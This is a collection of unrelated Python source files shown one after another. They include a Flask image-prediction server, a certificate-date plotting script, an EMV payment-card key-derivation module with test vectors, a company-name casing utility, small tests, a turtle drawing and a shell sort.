compare_cache[name]["dumper"] = [this_dumper]
compare_cache[name]["work_dir"] = self._work_dir
# compare_cache[name]["executor"] = weakref.proxy(executor_ins)
res = executor_ins.run()
result.append(res)
# clean cache for tempfile
finally:
for _, dumpers in compare_cache.items():
for dumper in dumpers.get('dumper', []):
dumper.clean()
return result
|
import os, sys, time, json, yaml, uuid
import redis
import torch
import numpy as np
from PIL import Image
from werkzeug.utils import secure_filename
from flask import Flask, request, flash, jsonify
mlpipe_root = os.path.abspath("../..")
# sys.path.insert(1, os.path.join(sys.path[0], mlpipe_root)
sys.path.insert(0, mlpipe_root)
# for p in sys.path:
# print(p + "\n")
# print(mlpipe_root)
from config.clistyle import bcolor
from servers.helpers.helperfunctions import base64_encoding, get_dtype
# Preprocessing specific
from torchvision import transforms
with open(mlpipe_root + "/config/settings.yaml", 'r') as stream:
try:
settings = yaml.load(stream)
except yaml.YAMLError as exc:
print(exc)
# TBD after merge
# with open("./config/allowedExtns.yaml", 'r') as stream:
# try:
# allowed_extensions = yaml.load(stream)
# except yaml.YAMLError as exc:
# print(exc)
app = Flask(__name__)
rdb = redis.StrictRedis(
host=settings['redis']['host'],
port=settings['redis']['port'],
db=settings['redis']['db']
)
# rdb.flushall()
def allowed_file(filename):
return '.' in filename and filename.rsplit('.', 1)[1].lower() in set(settings['data_stream']['allowed_extensions'])
def get_file_type(filename):
return '.' in filename and filename.rsplit('.', 1)[1].lower()
# def get_device():
# return torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
def torchTensor_to_npArray(tensor):
"""Detatch Tensor, write to cpu, conver to numpy array
"""
# Do checks first
with torch.no_grad():
print("TENS1: ", tensor)
tensor_detatched = tensor.detach()
print("TENS2: ", tensor_detatched)
tensor_cpu = tensor_detatched.cpu()
print("TENS3: ", tensor_cpu)
np_array = tensor_cpu.numpy()
print("ARR: ", np_array)
return np_array
def preprocessing(image):
# Define preprocessing transformation
composed = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])
preprocessed = composed(image)
preprocessed.unsqueeze_(0) # Set correct batch dimension
return preprocessed
@app.route("/predict", methods=["POST"])
def predict():
# device = get_device()
data = {"success": False}
if request.method == "POST":
# Check if file in inputted
if 'data' not in request.files:
flash("No file part")
raise ValueError("No file part")
# print("METHOD: ", request.method)
file = request.files['data']
filetype = get_file_type(file.filename)
if file.filename == '':
flash("No selected file")
raise ValueError("No selected file")
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
if request.files.get('data'):
user_input = request.files["data"] #.read()
if (filetype in ['jpg', 'jpeg', 'png']):
user_input = Image.open(user_input)
else:
pass
preprocessed_input = preprocessing(user_input)
# Get file properties
if filetype in ['jpg', 'jpeg', 'png']:
fileshape = np.array(preprocessed_input).shape
else:
fileshape = preprocessed_input.shape
array_dtype = get_dtype(preprocessed_input)
# HANDLE TORCH TENSORS
# print("DTYPE: ", array_dtype)
# if array_dtype == 'torch._':
# print("TORCH!")
# ### convert torch to numpy
# output_np = torchTensor_to_npArray(output1)
preprocessed_input = preprocessed_input.numpy()
preprocessed_input = preprocessed_input.copy(order="C")
encoded_input = base64_encoding(preprocessed_input)
k = str(uuid.uuid4())
d = {
"id": k,
"filename": filename,
"filetype": filetype,
"shape": fileshape,
"dtype": array_dtype,
"data": encoded_input
}
rdb.rpush(settings['data_stream']['data_queue'], json.dumps(d))
# Can i also send and receive torch tensors via redis?
# or setup automated function to resore them from np array
while True:
output = rdb.get(k)
if output is not None:
output = output.decode("utf-8")
data["summary"] = json.loads(output)
rdb.delete(k)
break
time.sleep(settings['data_stream']['client_sleep'])
data["success"] = True
return jsonify(data)
if __name__ == "__main__":
print((bcolor.BOLD + "* Loading PyTorch webserver... \n"
"please wait until server has fully started" + bcolor.END))
print("* Starting web service...")
app.secret_key = settings['flask']['secret_key']
app.run(
host=settings['flask']['host'],
port=int(settings['flask']['port']),
debug=settings['flask']['debug']
)
|
import os.path
for settings_name in ("default_settings.py", "settings.py"):
settings_path = os.path.join(os.path.dirname(__file__), settings_name)
if os.path.exists(settings_path):
execfile(settings_path, globals(), locals())
|
import matplotlib.pyplot as plt
from glob import *
from datetime import datetime, date
from statistics import mode
#input: a list of filenames
#Return: nothing, but produces and save graphs
def produce_date_graphs(date_files):
#Get the start dates and end dates from the files
start_dates, end_dates = get_dates(date_files)
#Defining earliest and latest dates to include in graphs
earliest = date(2015,1,1)
today = date.today()
latest = date(2025,12,1)
#Strip the lists for unwanted dates
for i in range(len(start_dates)):
if start_dates[i] > earliest:
start_dates = start_dates[i:]
break
for i in range(len(end_dates)):
if end_dates[i] > today:
end_dates = end_dates[i:]
break
for i in range(len(end_dates)):
if end_dates[i] > latest:
end_dates = end_dates[:i]
break
#Checking how many certificates issued / expired per month
issued_monthly = monthly(start_dates)
expires_monthly = monthly(end_dates, max_months = 40)
#Category
issued = 'Issue'
expired = 'Expiration'
#Important dates regarding Google announcements
important_dates = [date(2016, 9, 1), date(2018, 2, 1)]
#Generate the graphs
certificates_figure(issued_monthly, start_dates[0], start_dates[-1], issued, important_dates)
certificates_figure(expires_monthly, end_dates[0], end_dates[-1], expired, n = 3)
#Input: a list of filenames
#Return: two sorted lists of start dates and end dates
def get_dates(date_files):
#Create lists to store information
start_dates = []
end_dates = []
#Read each file with certificate dates
for file in date_files:
f = open(file,'r')
#Read each line in the file
for line in f:
#Split the information and add it to its respective lists
(website,start,end) = line.strip().split(":")
start_dates.append(datetime.strptime(start, '%Y-%m-%d').date())
end_dates.append(datetime.strptime(end, '%Y-%m-%d').date())
#Return the dates in sorted order
return (sorted(start_dates), sorted(end_dates))
#Input: a list of dates and number max_months (optional)
#Return: a list with number of monthly occurences
def monthly(dates, max_months = 0):
#Calculate the number of months between start date and end date
months = (dates[-1].year - dates[0].year)*12 + (dates[-1].month - dates[0].month) + 1
#Create a list to count monthly occurences
monthly_stats = [0]*months
#Run through all dates and count occurences
for d in dates:
index = (d.year - dates[0].year)*12 + (d.month - dates[0].month)
monthly_stats[index] += 1
#Strip the list if restricted number of months
if max_months > 0:
return monthly_stats[:max_months]
else:
return monthly_stats
#Input: a list l and a number n
#Return: lists of n top elements in l and their indexes
def n_largest(l, n):
#Creating lists to store top elements and their index
top = [0]*n
ind = [0]*n
#Run throug all elements in the list l
for i in range(len(l)):
#Assigning temporary values
e = l[i]
index = -1
#Checking if the element is greater than any
#in the list of top elements
for j in range(n):
if e > top[j]:
index = j
break
#If the element is bigger than any top elements,
#then insert it in the list and replace all smaller
if index > -1:
for j in range(n - index):
top[n-j-1] = top[n-j-2]
ind[n-j-1] = ind[n-j-2]
top[index] = e
ind[index] = i
#Return the n top elements in l and their indexes
return (top, ind)
#Input: list of occurences per month, start date, end date, label and optional list of important dates and number n
#Return: nothing, but creates and saves graphs
def certificates_figure(monthly_stats, start, end, text, important_dates = [], n = 0):
#Create new figure
fig = plt.figure()
#Set title for figure
fig.suptitle(text + " dates for X.509 certificates", fontsize=15, fontweight='bold')
#Add x-axis and y-axis to the figure
ax = fig.add_subplot(111)
ax.set_xlabel('Months from ' + str(start.strftime("%B %Y")) + " to " + str(end.strftime("%B %Y")),fontsize=12)
ax.set_ylabel('Number of certificates',fontsize=12)
#Add datapoints to the figure
ax.plot([i for i in range(1,len(monthly_stats)+1)], monthly_stats)
#Add top results to graph, depending on the size of n
if n > 0:
#Get top elements and indexes from the list
top,ind = n_largest(monthly_stats, n)
#Set higth to top element
h = top[0]
#Add text to label
ax.text(len(monthly_stats) - 20, h, "Most frequent:", fontsize=15)
#Run through all n top elements, optional
for i in range(n):
#Find the month of the given element
(y, m) = divmod(start.month + ind[i], 12)
d = date(start.year + y, m + 1, 1)
#Print the month of the given element
ax.text(len(monthly_stats) - 17, h*(1 - 0.1*(i+1)), "- " + str(d.strftime("%B %Y")) + ": " + str(top[i]), fontsize=15)
#Check if there is any important dates to add to the figure
if len(important_dates) > 0:
for d in important_dates:
#Find the month of the important date
x = ((d.year - start.year)*12 + (d.month - start.month))
#Find the top element and its index
top,ind = n_largest(monthly_stats, 1)
#Add name to the line of the important date
ax.text(x - 2, top[0] - 50, d.strftime("%B %Y"), rotation = 'vertical', fontsize=12)
#Add the line of the important date to the figure
plt.axvline(x, color = 'k', linestyle = '--')
#fig.show()
#Save the figure as pdf and png
fig.savefig("figures\\plot-" + text + ".pdf", dpi=150)
fig.savefig("figures\\plot-" + text + ".png", dpi=150)
#Close the figure
plt.close(fig)
#Input: a list of dates, number of months (optional, set to 61)
#Return: nothing, but creates and saves graphs
def produce_length_graph(date_files, n = 61):
lengths = []
#Run through all files in the list
for file in date_files:
f = open(file,'r')
#Run through all lines in the file
for line in f:
#Split the information, calculate the lenght and add it to the lists
(website,start,end) = line.strip().split(":")
s = datetime.strptime(start, '%Y-%m-%d').date()
e = datetime.strptime(end, '%Y-%m-%d').date()
lengths.append((e.year - s.year)*12 + (e.month - s.month))
#Create a list to store the data
occurrences = [0]*max(lengths)
#Count the occurences of all lengths
for l in lengths:
occurrences[l-1] += 1
#Strip the list for dates beyond n months
occurrences = occurrences[:n]
#Create new figure
fig = plt.figure()
#Add title to figure
fig.suptitle("SSL/TLS Certificate Validity", fontsize = 15, fontweight = 'bold')
#Add x-axis and y-axis to figure
ax = fig.add_subplot(111)
ax.set_xlabel('Number of months the certificate is valid',fontsize=12)
ax.set_ylabel('Number of certificates valid in $X$ months',fontsize=12)
#Add datapoints to the figure
ax.plot([i for i in range(1,len(occurrences)+1)], occurrences)
#Add the mode to the figure
ax.text(0.7 * len(occurrences), max(occurrences)*0.9, "Mode: " + str(mode(lengths)) + " months", fontsize = 12)
#fig.show()
#Save the figure as pdf and png
fig.savefig("figures\\certificate_lengths.pdf", dpi=150)
fig.savefig("figures\\certificate_lengths.png", dpi=150)
#Close the figure
plt.close(fig)
|
r"""Cryptographic key derivation functions for the ICC Master Keys and ICC Session Keys.
ICC Master Key derivation method A:
>>> import pyemv
>>> iss_mk = bytes.fromhex('0123456789ABCDEFFEDCBA9876543210')
>>> pan = '99012345678901234'
>>> psn = '45'
>>> icc_mk = pyemv.kd.derive_icc_mk_a(iss_mk, pan, psn)
>>> icc_mk.hex().upper()
'67F8292358083E5EA7AB7FDA58D53B6B'
"""
import binascii as _binascii
import hashlib as _hashlib
import typing as _typing
from pyemv import tools as _tools
__all__ = [
"derive_icc_mk_a",
"derive_icc_mk_b",
"derive_common_sk",
"derive_visa_sm_sk",
"derive_emv2000_tree_sk",
]
def derive_icc_mk_a(
iss_mk: bytes,
pan: _typing.Union[bytes, str],
psn: _typing.Optional[_typing.Union[bytes, str]] = None,
) -> bytes:
r"""ICC Master Key Derivation. EMV Option A.
Uses PAN, PAN Sequence Number, MK ISS, Triple DES.
Parameters
----------
iss_mk : bytes
Binary Issuer Master Key to derive ICC Master Key from.
Has to be a valid DES key.
pan : bytes or str
ASCII Application Primary Account Number.
psn : bytes or str, optional
ASCII 2-digit PAN Sequence Number (default 00).
Returns
-------
icc_mk : bytes
Binary 16-byte ICC Master Key.
Notes
-----
Derived from Issuer Master Key (iss_mk).
Uses EMV Option A - Master Key Derivation method which uses
the PAN and PAN sequence number, as defined in EMV Book 2, Annex A.
When a card is personalised the issuer will take the 3 iss_mk keys
and calculate the 3 icc_mk keys to be stored on the card.
- icc_mk_ac - used for the transaction cryptograms (ARQC, TC or AAC)
- icc_mk_smi - used for Issuer Script Integrity
- icc_mk_smc - used for Issuer Script Confidentiality
For further details see also:
- EMV 4.3 Book 2 Annex A 1.4 Master Key Derivation
- EMV 4.3 Book 2 Annex A 1.4.1 Option A
Examples
--------
>>> from pyemv import kd
>>> iss_mk = bytes.fromhex("0123456789ABCDEFFEDCBA9876543210")
>>> icc_mk = kd.derive_icc_mk_a(iss_mk, pan="12345678901234567", psn="01")
>>> icc_mk.hex().upper()
'73AD54688CEF2934B0979857E3C719F1'
"""
if psn is None:
psn = "00"
if isinstance(psn, bytes):
psn = psn.decode("ascii")
if isinstance(pan, bytes):
pan = pan.decode("ascii")
# Data A must be at most 16 digits, right-justified,
# zero-padded from the left.
data_a = _binascii.a2b_hex((pan + psn)[-16:].zfill(16))
# Data B is inverted data A
data_b = _tools.xor(data_a, b"\xFF" * len(data_a))
icc_mk = _tools.encrypt_tdes_ecb(iss_mk, data_a + data_b)
return _tools.adjust_key_parity(icc_mk)
def derive_icc_mk_b(
iss_mk: bytes,
pan: _typing.Union[bytes, str],
psn: _typing.Optional[_typing.Union[bytes, str]] = None,
) -> bytes:
r"""ICC Master Key Derivation. EMV Option B.
Uses PAN, PAN Sequence Number, MK ISS, Triple DES, SHA-1 and
decimalisation of hex digits.
Parameters
----------
iss_mk : bytes
Binary Issuer Master Key to derive ICC Master Key from.
Has to be a valid DES key.
pan : bytes or str
ASCII Application Primary Account Number.
psn : bytes or str, optional
ASCII 2-digit PAN Sequence Number (default 00).
Returns
-------
icc_mk : bytes
Binary 16-byte ICC Master Key
Notes
-----
Derived from Issuer Master Key (iss_mk).
Uses EMV Option B - Master Key Derivation method which uses
the PAN and PAN sequence number, as defined in EMV Book 2, Annex A.
When a card is personalised the issuer will take the 3 iss_mk keys
and calculate the 3 icc_mk keys to be stored on the card.
- icc_mk_ac - used for the transaction cryptograms (ARQC, TC or AAC)
- icc_mk_smi - used for Issuer Script Integrity
- icc_mk_smc - used for Issuer Script Confidentiality
For further details see also:
- EMV 4.3 Book 2 Annex A 1.4 Master Key Derivation
- EMV 4.3 Book 2 Annex A 1.4.2 Option B
Examples
--------
>>> from pyemv import kd
>>> iss_mk = bytes.fromhex("0123456789ABCDEFFEDCBA9876543210")
>>> icc_mk = kd.derive_icc_mk_b(iss_mk, pan="12345678901234567", psn="01")
>>> icc_mk.hex().upper()
'AD406D7F6D7570916D75E5DCAB8CF737'
"""
# For PANs with length of 16 or less method B works as method A
if len(pan) <= 16:
return derive_icc_mk_a(iss_mk, pan, psn)
if psn is None:
psn = "00"
if isinstance(psn, bytes):
psn = psn.decode("ascii")
if isinstance(pan, bytes):
pan = pan.decode("ascii")
# Data A must be an even number of digits,
# right-justified, zero-padded from the left.
if len(pan) % 2:
pan_psn = _binascii.a2b_hex("0" + pan + psn)
else:
pan_psn = _binascii.a2b_hex(pan + psn)
# Hash PAN || PAN sequence
digest = _hashlib.sha1(pan_psn).hexdigest()
# Get first 16 digits out the hash value.
result = "".join(
[d for d in digest if d in {"0", "1", "2", "3", "4", "5", "6", "7", "8", "9"}][
:16
]
)
# If there are not enough digits, substitute
# letters using the following decimalization table:
# Input a b c d e f
# Table 0 1 2 3 4 5
if len(result) < 16:
digest = "".join(
[d for d in digest if d in {"a", "b", "c", "d", "e", "f"}][
: 16 - len(result)
]
)
digest = digest.translate({97: 48, 98: 49, 99: 50, 100: 51, 101: 52, 102: 53})
result = result + digest
data_a = _binascii.a2b_hex(result)
# Data B is inverted data A
data_b = _tools.xor(data_a, b"\xFF" * len(data_a))
icc_mk = _tools.encrypt_tdes_ecb(iss_mk, data_a + data_b)
return _tools.adjust_key_parity(icc_mk)
def derive_common_sk(icc_mk: bytes, r: _typing.Union[bytes, bytearray]) -> bytes:
r"""EMV Common Session Key Derivation.
Parameters
----------
icc_mk : bytes
Binary ICC Master Key to derive session key from.
Has to be a valid DES key.
r : bytes, bytearray
Binary diversification value. Examples of diversification value:
- R = ATC || 00 || 00 || 00 || 00 || 00 || 00 (AC Session Keys)
- R = ARQC (Secure Messaging for Integrity and Confidentiality
Session Keys)
- R = ATC || 00 || 00 || UN (AC Session Keys)
- Any other proprietary value
Returns
-------
sk : bytes
Binary 16-byte Session Key.
Raises
------
ValueError
ICC Master Key must be a double length DES key
ValueError
Diversification value must be 8 bytes long
Notes
-----
For more information see:
- EMV 4.3 Book 2 Annex A 1.3 Session Key Derivation
- EMV 4.3 Book 2 Annex A 1.3.1 Common Session Key Derivation Option
Examples
--------
>>> from pyemv import kd
>>> mk = bytes.fromhex("0123456789ABCDEFFEDCBA9876543210")
>>> r = bytes.fromhex("001C000000000000")
>>> sk = kd.derive_common_sk(mk, r)
>>> sk.hex().upper()
'E9FB384AF807B940FEDCEA613461B0C4'
"""
if len(icc_mk) != 16:
raise ValueError("ICC Master Key must be a double length DES key")
if len(r) != 8:
raise ValueError("Diversification value must be 8 bytes long")
# SK Key A (i.e. first 8 bytes) = TDES(icc_mk)[r]
r_a = bytearray(r)
r_a[2] = 0xF0
# SK Key B (i.e. second 8 bytes) = TDES(icc_mk)[r]
r_b = bytearray(r)
r_b[2] = 0x0F
sk = _tools.encrypt_tdes_ecb(icc_mk, r_a + r_b)
return _tools.adjust_key_parity(sk)
def derive_visa_sm_sk(icc_mk: bytes, atc: bytes) -> bytes:
r"""Visa Secure Messaging Session Key Derivation.
Parameters
----------
icc_mk : bytes
Binary ICC Master Key to derive session key from.
Has to be a valid DES key.
atc : bytes
Binary data from tag 9F36 (Application Transaction Counter).
Returns
-------
sk : bytes
Binary 16-byte Session Key.
Raises
------
ValueError
ICC Master Key must be a double length DES key
ValueError
ATC value must be 2 bytes long
Examples
--------
>>> from pyemv import kd
>>> mk = bytes.fromhex("0123456789ABCDEFFEDCBA9876543210")
>>> atc = bytes.fromhex("001C")
>>> sk = kd.derive_visa_sm_sk(mk, atc)
>>> sk.hex().upper()
'0123456789ABCDF2FEDCBA987654CDF2'
"""
if len(icc_mk) != 16:
raise ValueError("ICC Master Key must be a double length DES key")
if len(atc) != 2:
raise ValueError("ATC value must be 2 bytes long")
# SK Key A (i.e. first 8 bytes) = r xor MK Key A
r = b"\x00" * 6 + atc
sk_a = _tools.xor(r, icc_mk[:8])
# SK Key B (i.e. second 8 bytes) = r xor MK Key B
r = b"\x00" * 6 + _tools.xor(atc, b"\xff\xff")
sk_b = _tools.xor(r, icc_mk[8:])
return _tools.adjust_key_parity(sk_a + sk_b)
def derive_emv2000_tree_sk(
icc_mk: bytes,
atc: bytes,
height: int = 8,
branch_factor: int = 4,
iv: bytes = b"\x00" * 16,
) -> bytes:
r"""EMV2000-Tree Session Key Derivation.
Parameters
----------
icc_mk : bytes
Binary ICC Master Key to derive session key from.
Has to be a valid DES key.
atc : bytes
Binary data from tag 9F36 (Application Transaction Counter).
height : int
Height value used for EMV-Tree derivation. Height controls
the number of levels of intermediate keys in the tree
excluding the base level. Set to either 8 or 16.
The specification recommends value 8. Defaults to 8.
branch_factor : int
Branch factor value used for EMV-Tree derivation. Branch factor
controls number of "child" keys a "parent" key derives.
The specification recommends value 4. Defaults to 4.
iv : bytes
16-byte binary initialization vector used for EMV-Tree derivation.
The specification recommends IV value of zeros. Defaults to 0s.
Returns
-------
sk : bytes
Binary 16-byte Session Key.
Raises
------
ValueError
ICC Master Key must be a double length DES key
ValueError
ATC value must be 2 bytes long
ValueError
Initialization vector value must be 16 bytes long
ValueError
Number of possible session keys must exceed maximum ATC value
Notes
-----
For more information see:
- EMV 4.1 Book 2 Annex A 1.3 Session Key Derivation
- EMV 4.1 Book 2 Annex A 1.3.1 Description
- EMV 4.1 Book 2 Annex A 1.3.2 Implementation
This method was replaced by common session key derivation in 2005
and should not be used for new development.
See EMVCo specification update bulletin 46 (SU-46).
Recommended branch factor and tree height combinations are as follow.
Both combinations produce enough session keys for every possible ATC value.
- Branch factor 2 and tree height 16
- Branch factor 4 and tree height 8
Examples
--------
>>> from pyemv import kd
>>> mk = bytes.fromhex("0123456789ABCDEFFEDCBA9876543210")
>>> atc = bytes.fromhex("001C")
>>> sk = kd.derive_emv2000_tree_sk(mk, atc, 8, 4)
>>> sk.hex().upper()
'E5BF6D1067F194B0A89B7F5D83BC64A2'
"""
if len(icc_mk) != 16:
raise ValueError("ICC Master Key must be a double length DES key")
if len(atc) != 2:
raise ValueError("ATC value must be 2 bytes long")
if len(iv) != 16:
raise ValueError("Initialization vector value must be 16 bytes long")
# The number of possible session keys (branch_factor ** height)
# must exceed the maximum value of the ATC which is 2 ** 16 - 1.
if branch_factor ** height < 65535:
raise ValueError(
"Number of possible session keys must exceed maximum ATC value"
)
# F(X,Y,j) := (DES3(X)[YL XOR (j mod b)] || DES3(X)[YR XOR (j mod b) XOR 'F0'])
def derive(x: bytes, y: bytes, j: int) -> bytes:
"""Map two 16-byte numbers X and Y and an integer j onto a 16-byte number."""
j_mod_b = int.to_bytes(j % branch_factor, 8, "big")
# (DES3(X)[YL XOR (j mod b)]
l_data = _tools.xor(y[:8], j_mod_b)
l_data = _tools.encrypt_tdes_ecb(x, l_data)
# DES3(X)[YR XOR (j mod b) XOR 'F0']
r_data = _tools.xor(y[8:], j_mod_b)
r_data = _tools.xor(r_data, b"\x00" * 7 + b"\xF0")
r_data = _tools.encrypt_tdes_ecb(x, r_data)
return l_data + r_data
# GP = Grandparent Key
# IK = Intermediate Key
# P = Parent Key
# H = Height of the tree
def walk(j: int, h: int) -> _typing.Tuple[bytes, bytes]:
"""Returns P and GP"""
# Base case: P = ICC MK, GP = IV
if h == 0:
return icc_mk, iv
p, gp = walk(j // branch_factor, h - 1)
# Derives an IK from P and GP
# IK becomes the new parent and current P becomes the new GP
return derive(p, gp, j), p
atc_num = int.from_bytes(atc, "big")
# Derive IKs from the bottom of the tree to the second to last level
# because GP from that level is required for SK.
p, gp = walk(atc_num // branch_factor, height - 1)
# Derive SK from a new IK at the tree height XOR'd by GP.
sk = _tools.xor(derive(p, gp, atc_num), gp)
return _tools.adjust_key_parity(sk)
|
# coding=utf-8
import codecs
import os
from collections import Counter
class CompanyCase:
def __init__(self, language='en', ngram_length=2):
self.ngram_length = ngram_length
self.transitions = self.fetch_all_transitions(language, ngram_length)
self.norm_transitions = self.normalize_transitions(self.transitions)
# While most sensible parameters will capitalize the acronyms, forcing them here
# to make sure they don't get title cased for whatever set of parameters.
self.force_case = ['of', 'and', 'IT', 'PLC', 'LLC', 'Ltd', 'LLP']
def find_ngrams(self, input_list, n):
""" Returns a list of n-grams """
return map(lambda x: ''.join(x), zip(*[input_list[i:] for i in range(n)]))
def fetch_all_transitions(self, language, ngram_length):
""" Generate a dict of counts for transitions for all n-grams in the language word list """
wordlist = os.path.join(os.path.dirname(__file__), "wordlists/{0}.txt".format(language))
if not os.path.exists(wordlist):
raise SystemError("Language '{0}' does not exist".format(language))
all_grams = []
with codecs.open(wordlist, 'r', encoding='utf-8') as f:
for line in f:
words = line.strip('\n').lower().split()
ngrams = reduce(lambda x, y: x + y, map(lambda word: self.find_ngrams(word, ngram_length), words))
all_grams += ngrams
return dict(Counter(all_grams))
def normalize_transitions(self, t):
total = float(reduce(lambda x, y: x + y, t.values()))
return dict([(x, y/total) for x, y in t.iteritems()])
def force_case_for_words(self, l):
"""
Add additional words to force case for
:param l: a list of words to force the case for
:return: None
"""
self.force_case += l
def score_word(self, word):
""" Returns the mean transition likelihood score for the word """
ngrams = self.find_ngrams(word.lower(), self.ngram_length)
if len(ngrams) < 1:
return 0.0
return sum(map(lambda x: self.norm_transitions.get(x, 0), ngrams)) / len(ngrams)
def apply(self, company_name, threshold=0.001):
"""
Applies the case transformation on the given string
:param company_name: string representing company name
:param threshold: the transition score threshold to identify abbreviations
:return: a string containing words with fixed case
"""
if type(company_name) == unicode:
company_name = company_name.encode('utf-8')
fixed_name = []
for word in company_name.split():
fixed_word = None
# Check if the word is to be force cased
for x in self.force_case:
if x.lower() == word.lower():
fixed_word = x
break
if not fixed_word:
# Title case if dictionary word-like
# else, Upper case
score = self.score_word(word)
if score < threshold:
fixed_word = word.decode('utf-8').upper()
else:
fixed_word = word.decode('utf-8').title()
# Clean up any trailing 'S
if fixed_word.endswith("'S"):
fixed_word = fixed_word[:-1]+'s'
fixed_name.append(fixed_word)
return ' '.join(fixed_name)
|
import pytest
from ..http_status import HttpStatusBase
from ..mock_data import MockDataHandler
md_handler = MockDataHandler()
@pytest.mark.integration
@pytest.mark.mockdata
@pytest.mark.response
class TestMockDataResponseFormat(HttpStatusBase):
@pytest.mark.parametrize("frmt", ["", "json", "jsonl", "ttl"])
@pytest.mark.parametrize("endp_req", [
"/resources/1358199159",
])
def test_mock_format(self, endp_req, frmt, overwrite_mock_output):
""" Query Search endpoint."""
if not frmt:
frmt = "json"
res = self._http_response(endp_req)
fname = type(self).__name__ + endp_req
else:
res = self._http_response(endp_req, get_param={"format": frmt})
fname = type(self).__name__ + endp_req + "-" + frmt
if overwrite_mock_output:
md_handler.write(fname, res.text, format=frmt)
md_handler.compare(fname, res.text, format=frmt)
if __name__ == '__main__':
pytest.main()
|
import pytest
from seleniumbase import BaseCase
from qa327.models import db, User
from qa327_test.conftest import base_url
from unittest.mock import patch
from werkzeug.security import generate_password_hash, check_password_hash
test_user = User(
email='test_frontend@test.com',
name='testuser',
password=generate_password_hash('test_frontendA1$')
)
class R7TestPost(BaseCase):
# Logout will invalidate the current session and redirect to
# the login page. After logout the user should not be able to
# access restricted pages
@patch('qa327.backend.get_user', return_value=test_user)
def test_r1_post_1(self, *_):
# logout
self.open(base_url + '/logout')
# check if we are on the login page now
self.assert_text("Please Login")
# try to go to /
self.open(base_url)
# validate that we are still on the login page
self.assert_text("Please Login")
|
from icemet_sensor import homedir, datadir
from icemet.cfg import Config, ConfigException
from icemet.pkg import name2ext
import os
import shutil
default_file = os.path.join(datadir, "icemet-sensor.yaml")
def create_config_file(dst):
os.makedirs(os.path.split(dst)[0], exist_ok=True)
shutil.copy(default_file, dst)
class SensorConfig(Config):
def set_dict(self, dict):
super().set_dict(dict)
self.save = type("SaveParam", (object,), {
"dir": os.path.expanduser(os.path.normpath(dict["save"]["dir"])),
"type": dict["save"]["type"],
"is_pkg": False,
"ext": None,
"tmp": None
})
ext = name2ext(self.save.type)
self.save.is_pkg = bool(ext)
self.save.ext = ext if ext else "."+self.save.type
self.save.tmp = os.path.join(self.save.dir, "tmp" + self.save.ext)
self.meas = type("MeasureParam", (object,), {
"burst_fps": float(dict["measurement"]["burst_fps"]),
"burst_delay": 1.0 / float(dict["measurement"]["burst_fps"]),
"burst_len": int(dict["measurement"]["burst_len"]),
"wait": float(dict["measurement"]["wait"]),
})
self.sensor = type("SensorParam", (object,), {
"id": int(dict["sensor"]["id"], 16)
})
self.camera = self._creatable(dict["camera"], "CameraParam")
self.laser = self._creatable(dict["laser"], "LaserParam")
self.temp_relay = None
if dict["temp_relay"]:
self.temp_relay = self._creatable(dict["temp_relay"], "TempRelayParam")
self.ftp = type("FTPParam", (object,), {
"enable": dict["ftp"]["enable"],
"host": dict["ftp"]["host"],
"port": int(dict["ftp"]["port"]),
"user": dict["ftp"]["user"],
"passwd": dict["ftp"]["passwd"],
"path": os.path.normpath(dict["ftp"]["path"])
})
self.preproc = type("PreprocParam", (object,), {
"enable": dict["preproc"]["enable"],
"crop": type("CropParam", (object,), {
"x": int(dict["preproc"]["crop"]["x"]),
"y": int(dict["preproc"]["crop"]["y"]),
"w": int(dict["preproc"]["crop"]["w"]),
"h": int(dict["preproc"]["crop"]["h"])
}),
"rotate": float(dict["preproc"]["rotate"]),
"empty": type("EmptyParam", (object,), {
"th_original": int(dict["preproc"]["empty"]["th_original"]),
"th_preproc": int(dict["preproc"]["empty"]["th_preproc"])
}),
"bgsub_stack_len": int(dict["preproc"]["bgsub_stack_len"])
})
def _creatable(self, obj, clsname):
k = next(iter(obj))
return type(clsname, (object,), {
"name": k,
"kwargs": obj[k]
})
|
from turtle import *
from math import *
bgcolor("black")
speed(5)
ht()
colors = ["#FF4858", "#72F2EB", "#747F7F"]
x, y, r = 0, -40, 400
direction = 90
c = 0
while r > 20:
color(colors[c % len(colors)])
pu()
goto(x, y)
seth(direction)
fd(r)
right(162)
pd()
length = r * sin(pi * 2 / 5) / (1 + sin(pi / 10))
begin_fill()
for _ in range(5):
fd(length)
left(72)
fd(length)
right(144)
end_fill()
direction += 180
r = r * sin(pi / 10) / cos(pi / 5)
c += 1
done()
|
def shell_sort(arr: list) -> list:
"""Sort a list using shell sort
Args:
arr (list): the list to be sorted
Returns:
list: the sorted list
"""
# Calculate the gap to sort the items
gap = len(arr) // 2
# While the gap isn't 0
while gap > 0:
# Set i to the first element
i = 0
# Set j to the element of the gap
j = gap
# Loop over all items from gap to arr end
while j < len(arr):
# If the ith element is greater, swap the items
if arr[i] > arr[j]:
arr[i], arr[j] = arr[j], arr[i]
# Increase i index and j index to simulatiously
# Moves both pointers at the same time
i += 1
j += 1
# Set k to the index of the left selected element
k = i
# While k is greater than or equal to gap,
# Make it smaller than gap
while k >= gap:
# Check for
# left element > right element
if arr[k - gap] > arr[k]:
# Swap if true
arr[k - gap], arr[k] = arr[k], arr[k - gap]
# Reduce k to keep it within gap
k -= 1
# Make gap smaller
gap //= 2
return arr
|
# Quantum Inspire SDK
#
# Copyright 2018 QuTech Delft
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Module credentials
==================
The following functions use a resource file to store credentials information
for the user. The default location of this resource file is
:file:`.quantuminspire/qirc` in the user's home directory.
This default location is indicated with `DEFAULT_QIRC_FILE` in the following function signatures.
.. autofunction:: load_account(filename: str = DEFAULT_QIRC_FILE) -> Optional[str]
.. autofunction:: read_account(filename: str = DEFAULT_QIRC_FILE) -> Optional[str]
.. autofunction:: store_account(token: str, filename: str = DEFAULT_QIRC_FILE, overwrite: bool = False) -> None
.. autofunction:: delete_account(token: str, filename: str = DEFAULT_QIRC_FILE) -> None
.. autofunction:: save_account(token: str, filename: str = DEFAULT_QIRC_FILE) -> None
